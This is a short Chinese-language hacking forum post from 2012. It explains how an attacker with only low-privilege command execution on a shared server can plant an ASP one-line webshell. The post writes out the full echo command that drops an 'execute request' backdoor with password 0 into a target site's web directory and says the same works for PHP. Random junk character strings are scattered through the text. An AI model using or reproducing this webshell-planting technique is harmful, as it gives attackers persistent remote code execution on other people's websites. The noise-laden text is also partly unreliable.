中国网络渗透测试联盟

标题: 旁注cmd低权限下拿webshell [打印本页]
作者: admin    时间: 2012-9-23 14:40
标题: 旁注cmd低权限下拿webshell
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
' Y- d; U) e0 Y
+ T! w/ n: Y  D1 E: J+ V& G命令格式
7 v5 u, @' J/ w7 M3 D
; y/ C, v; o7 e1 v# FEcho 语句 >目标站绝对目录
# B% X! t; D% T! ^8 J* @( J9 Q8 G
例如: + z2 z; _& A  N9 a% d

* Z, a8 M' @, o3 l4 j: h3 lecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp) E+ a9 |4 I: _* y6 e6 [% Y9 J9 Q
# p' }/ u1 u& o  {1 t8 [3 w
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
; S& P2 g# O. ]) e6 Y7 \



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2